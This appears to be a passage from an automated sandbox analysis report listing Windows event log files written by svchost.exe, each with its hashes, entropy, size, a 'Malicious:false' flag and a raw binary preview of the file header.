                                                Preview:ElfChnk.\...............\.......................X...j.......................................................................LU.t................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F............................................;..............&...................................i..................................mS..............**..8...\........=..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):1.166433348209963
                                                Encrypted:false
                                                SSDEEP:384:/hwCCRzCaCkClCzCYC/CyCVCGCMCvCACWCKECQCMCdC:/KF6
                                                MD5:9AB3073B8BEBBC3C1E9DCB47217C8E27
                                                SHA1:33477618A675262EFDC74FACE70AE448EE9CAA05
                                                SHA-256:E19A280A63CB747D2029892A6F0E67D2C83461FF15112067AF24B8B5E136CC30
                                                SHA-512:58DD3DECA39CBF605861F78EDD27F3F97858581322063E9F7F1169C9F190613A22649289959A525729F503643B5EFDF5C1C20EE43C21B69C9B4468BA0BDAD6F5
                                                Malicious:false
                                                Preview:ElfChnk.....................................04..h6............................................................................4................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................................................................+................................../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Store%4Operational.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):2000
                                                Entropy (8bit):3.9946609770137957
                                                Encrypted:false
                                                SSDEEP:24:MoVadg2WYF0378Cql8CEZOFBSH7iR0Lh7NsLH8Cql8C5jnMClOX5h1qya6l:M28WF3wCq6CYOFBBROycCq6ClmUyN
                                                MD5:1AA0395FFC632648A882DDBC588BE539
                                                SHA1:29E322C9A85D6A76A2EDD3AB17BA703112D598BE
                                                SHA-256:9C99B373D595439DF9307CC5BD1F59ACE4B0BEEC5ED3F551666B44611414707C
                                                SHA-512:CED5BC83650581DBDC3EAB9A4EFACF00E57B25CB77C38E2A28E2F9EDFE73C87C117DF8E16AB0ECEA8ED14A0BEFBDB4272DE2890C1D4941E6EAC332BAA8EB54E9
                                                Malicious:false
                                                Preview:ElfChnk..%.......%.......%.......%...........u...x.........................................................................g...........................................6...=...........................................................................................................................f...............?...........................m...................M...F........................H..................................u...............................................&........*..............................**.......%......R.#.MQ.........Z..&.......................................................................F.....!...A.A...........R.#.MQ....B.K....................%...................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.t.o.r.e..7*...\..C.....M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.t.o.r.e./.O.p.e.r.a.t.i.o.n.a.l......................I.......I.n.v.o.k.i.n.g. .l.i.c.e.n.s.e. .m.a.n.a.g.e.r. .b.e.c.a.u.s.e. .l.i.c.e.n.s.e./.l.e.a.s.e. .p.o.l.l.i.n.g. .t.i.m.e. .u.p.:. .P.F.N. .M.i.c.r

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storsvc%4Diagnostic.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):1.1796574971957638
                                                Encrypted:false
                                                SSDEEP:384:zhL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUm6UmaUmVAUmXpUm:zY7L8
                                                MD5:8B560A881A5F9C759620FF8E1A6D3AEA
                                                SHA1:DABE1E8C072F979D2F3FC3927E09D806B0F4C575
                                                SHA-256:63A1F1160F85695D3AAB8A3BFA9CAE002376DDAB7A1AEFB3BF0E56C6012C63B0
                                                SHA-512:4E88834822DC8C93A430D4DF88BBB555E2591062412D23DC351E7EDCD3F74BF0B7D2A7DD5E7DA7A1BDB4F380AD0E765410EFC6DE5FF8D531DC6FECE4162BBD01
                                                Malicious:false
                                                Preview:ElfChnk......................................1..(4...F.........................................................................V................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................................................>-......................................**..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-TZUtil%4Operational.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.20398547605747852
                                                Encrypted:false
                                                SSDEEP:48:MXVWd8WrP+8QNRBEZWTENO4brBE3on+/6y:GfNVaO8io+/6y
                                                MD5:8D18D521020D4337E27D4347655AB3C0
                                                SHA1:6031B33F14245E733725472C6A3362F0C48ED391
                                                SHA-256:9C6ECC9531362572DC9EDE096E13BF9301E7412865EC6D44C856E875C9BB6465
                                                SHA-512:C084FD6FAF3F901B882B996ACFADFC2D3FC838E9874803DAE182A694065CDC9D9A4EB27D6FC6B68D76EEA70A6448E5EA2BE0372AD10C5C3E49DB0F3980F40462
                                                Malicious:false
                                                Preview:ElfChnk..............................................v......................................................................j7..................".......................J...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..............1oG.g..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):1.9658503180918458
                                                Encrypted:false
                                                SSDEEP:384:khHivRiLiakrkEi5iciMiHiQi8ixiBiFioikiFiixFiIMZifiwiLitixgZJiJi/P:kgtxHMa
                                                MD5:9961A2C4F5AC430AB4FE55D69904E2C9
                                                SHA1:BA49A1A12A889812148BECC8D5B285AD418D54FE
                                                SHA-256:EAE8AAB4F398C27A8E7855C8524389EBE4F695B28D2B51E9EA916738D5E579E9
                                                SHA-512:B7B0B29444E2B9BECCA18B96D5CA3D7098236C9919F7DE59A37405012C19C6B641CD3C1DA7E9E12F454004B93BB022F689125D31E26825929BB9A7D79FEF3199
                                                Malicious:false
                                                Preview:ElfChnk.y...............y................... d..0f.....6.....................................................................;.................>,..........................=.......................#.......................................>...........................................................f...............?.......................P.......................M...F...................................................9.......n(...............................................:...............,......................**......y..........a...........g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):3.409315294922095
                                                Encrypted:false
                                                SSDEEP:768:g9aQLBaPaLaTaHax9aDavaraHafavajavaPaPaDaza7a7aXa7aHaDaTanaLa7an6:YLa
                                                MD5:9E49EF68D56FB46D2B69FD623A107E01
                                                SHA1:4A41E44DBB7B968B2FCF0AC5E5F0304B9CBB9B4A
                                                SHA-256:683DB8F2A866C865E310319C4D470A8DDB68BE647576ED477E8E0E15BE224566
                                                SHA-512:A5CE16978273B8B623E98ABE1081F03BFB4B5FEFDC7893D2E921F0E5BFC96A56DAE0A959CB418B3300F3E596A5D15D442C91BDAB3F7E929150078BCDBF355476
                                                Malicious:false
                                                Preview:ElfChnk.........@...............@...............`...............................................................................................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&...;...................................**..H...............f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Device Registration%4Admin.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):1.3650161876414235
                                                Encrypted:false
                                                SSDEEP:384:2haXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJiXJtXJiXJWTXJpXJUXJ4XJ:2Q0yUkNYwD8imLEWTWW1fsg
                                                MD5:346E087AE87A771402B2E38619AB7B71
                                                SHA1:4B7EFEA99E401A5E6C0D115E2B27C48778704C13
                                                SHA-256:82B60B9565D3FDA733EF5B4A6996AD51C08BC604BE6DC184255A8928B1220EE5
                                                SHA-512:63C3EB568562AD3560924F7830F0ED120CC362A9FC24EA6CCE4B0EC5F90A0BBEF58539C26B5379A5E6D1939BED7D06A92B4A2521775AF2516793F42A289C0E4B
                                                Malicious:false
                                                Preview:ElfChnk......................................A...D.....<....................................................................7...................j...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&................................................6..........C...........................**..............@V.$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Profile Service%4Operational.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.335318634068108
                                                Encrypted:false
                                                SSDEEP:384:ehRmsmRm1m4mXm9mSmBmStmtmimMmAmAmRmcmxHmEmqmwmHmLmlm9mGmdmpm3mfr:euDcxMmo
                                                MD5:3B31610BEABB5895A19C346C64C234C6
                                                SHA1:84316C06991A51AD91C247130B615F0E56CD4D01
                                                SHA-256:EA4D4D4A4D56D42B0205793B2C9E45A732EA2F8909095BF924C2F4A138DE0404
                                                SHA-512:2B9784678702654E8FA65456A501F9F6B48ABD575EE58264709A97FFF9C38C26C7A6ED9057278E1A090BBB4BD2F88FBC95E636D9DEE509142B67B4D81FBAB5A1
                                                Malicious:false
                                                Preview:ElfChnk......................................'...(..'.D........................................................................R................L.......................t...=...........................................................................................................................f...............?...........................m...................M...F...............................................K...........................................%...............&.......................................**.................Hf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.7112352075765392
                                                Encrypted:false
                                                SSDEEP:192:BV7VDiDL/bDiDwTDiDHDiDDDiDSDiD8DiDkDiD0DiDEDiDMDiDMDiDMDiD:BhV2nT2UT272/2+2w2g2w2I2o2A2I2
                                                MD5:5D63AFB3EA60A7655FF95B4DB1B451E0
                                                SHA1:B5D236316CC6617071D83D7E1B4367DDA1A889B1
                                                SHA-256:815D1AE9187ED88319DDCD4F95D544E3B4FC3D12E2BF9A0DFD30441819089010
                                                SHA-512:C00665A8527B92BB677696119894947DA47603CD1168B3536E7317E8D82C1A3563D50612C4AEF5BDEE75D491AEC97F8AB543F5FA1EB5E4080E7B1D8A55FE57E6
                                                Malicious:false
                                                Preview:ElfChnk.............................................u.=k....................................................................Z}#.................N.......................v...=...........................................................................................................................f...............?...........................m...................M...F...............................'...........................................................................&.......................................**.................sf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:modified
                                                Size (bytes):78280
                                                Entropy (8bit):4.37274168715729
                                                Encrypted:false
                                                SSDEEP:384:Y2ZhlR0CsRNHKRwR0kRpnkRTHJRORjRAKhRemXR9XPRFrRXVRcrRb8RWRrR4QRSP:Y2ZiIpm3X3NI538LMu2ZiIg
                                                MD5:EC52547861907CD25BBDD96EE34BC426
                                                SHA1:3C3101BB2C3D052820B1D4E6567D5CD70A16BA1C
                                                SHA-256:4130D7FDA25EF432205A1A049968A3E3BE7E608077A0FC6531F5B37D829AE9F7
                                                SHA-512:92A13FD7680A9A0F18ED83FC020FCE42863EB43C5C38686F5CA79DC0304961A5584BDE7EE6551FC494E92F1BBC18B5FBB62BA9F834545642937E4645D89026FA
                                                Malicious:false
                                                Preview:ElfChnk.J.......S.......J.......S............,.../..$7.U....................................................................'t2(....................C.......Q............+..=.......................................0 ..d...................?*..7!...........................................*......(...f...+...........?....................... .......................M...F........*.......*..............................&...........................................................a)..................................*...**......J.........l.f..........'.z&........'.z..^................A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Wcmsvc%4Operational.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.282820835556058
                                                Encrypted:false
                                                SSDEEP:384:chOhpuhdh+h9hthXhzh8cghshqh9hihXhMhxhzhwhohGh5h3hShChWhzhLhahYhr:cQsFpkBc1S
                                                MD5:7DB7567819F7CFC6955126B8306826E6
                                                SHA1:45CCB1C41CA1C6E1384207444A8B84437408DF1A
                                                SHA-256:0DDCE2B5ADFAAB4EF8A1686D0064B8CCFF43B1D3C93893A62EF07B7FB896E8E5
                                                SHA-512:FF5F662885580210B522215F56FD29417B6555F0878610D44D8F798E044876F99F86C5FF688BB77C92B894368E5DF32130B52BFE37401BACD3305B63463A2394
                                                Malicious:false
                                                Preview:ElfChnk.........................................P.....Q................................................................................................................:...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&...............!.......................**...............k..f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-WebAuthN%4Operational.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):1.232783163157918
                                                Encrypted:false
                                                SSDEEP:384:ZhOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVMV3VJmVhpVEVA:Zyjbj
                                                MD5:71A005B17A2D32C10709277023D447E6
                                                SHA1:14754F04007D539159F75D62AACC6A282CAA8D54
                                                SHA-256:6E220C6CCBB76AEE639EDFCC6204C80EEC9FA1CCE0AC40EE4B821AF3AC27887B
                                                SHA-512:BC3533B3DEF1BC8B7D990700CA573EFF57D05C4E72DF2BB536247466D5FE9EB5DFE6F2EC18F02C808449F998AC00E26E920E3984B4E8367F8E9AF188BD1D9518
                                                Malicious:false
                                                Preview:ElfChnk.........!...............!............7..`8...).....................................................................Ce.~................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................v................................................+......................................**..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.214068193893233
                                                Encrypted:false
                                                SSDEEP:384:fhZBwBjsrBwBhBwBj4BwB6p+/4WBwBQ/cBwBjQNqObx13ABwBqhdBwBQ/LQBwBQT:fOsc6QNqObxzyS3qes
                                                MD5:B2610EC866576D271A9522E657F39D4F
                                                SHA1:530940E1CB305D386909A1A9F8D23A9D44119A9A
                                                SHA-256:ACC8BF376283357D6564DBF76AAEAB7BA62A5E2F784685EC8927C28A9F3F30A8
                                                SHA-512:031C0A41753F8D69848BA78BA63D54430C5059F478B8B052516EB12390BBB1DB89F8B39BF78492A93E738985F23B55C2B5E26DBE80F4E97A028EED57E1ACF81A
                                                Malicious:false
                                                Preview:ElfChnk.^.......m.......^.......m...........@;..p>..y..H......................................................................[.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................g...............................................................................&.......................................**.. ...^...........f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winlogon%4Operational.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.414298413407747
                                                Encrypted:false
                                                SSDEEP:384:3thQUE2UEFUE5UEKUEODUEzUEFUEsUE/UEGUE6UEWUE9UEtUEBUE8UEGUEuUE5UD:9w/RPoP6e
                                                MD5:77D9AFD001F6BBD592C19652D671FEA3
                                                SHA1:B87EA73299713B00D44A123C4B48636957EA90CE
                                                SHA-256:E25E174DE18D3B90B5EBC3C394A7C6BFC34F3E27FB260758BC8CB135E4D45770
                                                SHA-512:C81A545351015315060E812535A43C97A0FCBC2F49AA2034B50F963839F7F7DC1BC16EF070D5FF951E5FE82A9B315E8EFC20470707FD8C995A932E44369845E8
                                                Malicious:false
                                                Preview:ElfChnk.........................................8...,..t......................................................................>................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..............._..f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\Security.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.252693185152558
                                                Encrypted:false
                                                SSDEEP:384:dFRoTjoNSg0PtocChoLu60zCwySonMt0SoHMtoLoHMtaoDoH5OD0obO9ZoJfvoP9:/aFj0Dyid9sIryVpxy
                                                MD5:5C12993EF826BF67E7462D1134FF6999
                                                SHA1:07DEFCE37887AD084BBE1247F60EDD6D83024703
                                                SHA-256:B2BA7A31B552904FED5768F4B48EEA86E89585C4E121CB9D07124BAAACF83580
                                                SHA-512:8617229554B20900F60671D1E76EB94B20597C8B19B427E4DE54BD342F67FC8AF57E2C89265F755B4270F902EE38EA7BBC3D271FF30B7BD8ABA454FE26D55CA3
                                                Malicious:false
                                                Preview:ElfChnk......................................... ..........................................................................5......................s...h...............N...=...................................................N...............................................w.......6......................./...................................]...........).......M...T...:...............................................................................................................&...............................**.. .............).MQ..........*.&.........*.9.LS5..f....A.......A..5...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....^...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.

                                                C:\Windows\System32\winevt\Logs\Setup.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):67992
                                                Entropy (8bit):0.404065434054163
                                                Encrypted:false
                                                SSDEEP:48:MMWrrP+8QNRBEZWTENO4brBE3ogpNZ8Sm8VmTNNvAeWrrP+8QNRBEZWTENO4brBO:ZNVaO8ioyL8SRO2WNVaO8ioyL8SRO2
                                                MD5:CB1B5B0BFA36B789991B9CF986E25BA3
                                                SHA1:2CE0D02E2B8C1101904AE36E9F3BAF559D05EEC3
                                                SHA-256:4B8B5820CCFE501B16B54139D2DD604F7DCC6AB86AC469A66086CF581269182B
                                                SHA-512:8FF0554E8F04323E64D50BB659FE4BB1FFEE024F08753D06AB98C65DB1707588518C9642244F1D4881FEC23FF9B0314D61A4004263E4B0A963A3F48C4BA4E178
                                                Malicious:false
                                                Preview:ElfChnk.......................................................................................................................Q............................................=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..................MQ.........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                C:\Windows\System32\winevt\Logs\System.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):71376
                                                Entropy (8bit):4.441260721441028
                                                Encrypted:false
                                                SSDEEP:768:CZvHRUOnQ5xyZvHRUOnQQ46/iP6f/QRKe+PH+Yekm:QHRUzgHRUlfP6gMPZdm
                                                MD5:0CF0746653CD60928D1861168ACE8413
                                                SHA1:983B152D0FBE5D5BE46515E508CE16A5DADE1993
                                                SHA-256:E8F12B1AEBCE2E56DA10D5A1E8C83CC1AF1EF98BC2D0EF9A17D729B68B4B225B
                                                SHA-512:2FA9092A118003FB4CFA4A240AF9C54C14F8AE2A5FDEFDD7354FEF5E06DD58F0EC8B504240C1B52B52DB90301F2062CC38837B6BF6C499376F5E83A27CD8BF55
                                                Malicious:false
                                                Preview:ElfChnk......................................#...$..Hp.........................................................................................>...s...h...............f...=...................................................N...................................x#..........w.......2.......................G...................................Y...........).......M...5...:...................................................d ..................................................&... ...."......................&.......**..............|.3.MQ.........Z..&........Z.. ..Z...`............A......M...s....j.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....V........A..............F=.................A....................................N................w............................................................A...............:...............h.........A..............F..................A......).......FN........s............................

                                                C:\Windows\System32\winevt\Logs\Windows PowerShell.evtx

                                                Download File
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):75736
                                                Entropy (8bit):3.803797884933146
                                                Encrypted:false
                                                SSDEEP:1536:/xZeigBbXtM3nHNH4kZxZeigBbddhxJVf+9f9f+AHF5bx7CQR:YsEhxJVf
                                                MD5:32B94D29D0D9E7DA08CD72BCF8E37A7A
                                                SHA1:862B476D329CD667DB29BAEC29B8D4AE9FB883CB
                                                SHA-256:60859A51794E2F9956FBE27782C0B5488D717CA24943F784FB9FB9E2F235E1DF
                                                SHA-512:779C914FDA5F4097E5355D1C0D85710BD9D367A0815372925EAA8E0DB7920C61C5C3BDEEF69780479B5CEB235368CE2235C507C6D81CC3DD360B965BD14B5364
                                                Malicious:false
                                                Preview:ElfChnk.................i....................m...r..D.$H.......................................................................r............................................=..........................................................................................................................._...............8...........................f...................M...c...........................p...............&.......................................................................................................**......y...........MQ........!j..&.....................................................................................!.....X...............MQ..........y..............w.)Cp...................R.e.g.i.s.t.r.y...S.t.a.r.t.e.d.....P.r.o.v.i.d.e.r.N.a.m.e.=.R.e.g.i.s.t.r.y.......N.e.w.P.r.o.v.i.d.e.r.S.t.a.t.e.=.S.t.a.r.t.e.d...........S.e.q.u.e.n.c.e.N.u.m.b.e.r.=.1...........H.o.s.t.N.a.m.e.=.C.o.n.s.o.l.e.H.o.s.t.......H.o.s.t.V.e.r.s.i.o.n.=.5...1...1.9.0.4.1...1.6.8.2.......H.o.s.t

                                                Static File Info

                                                General

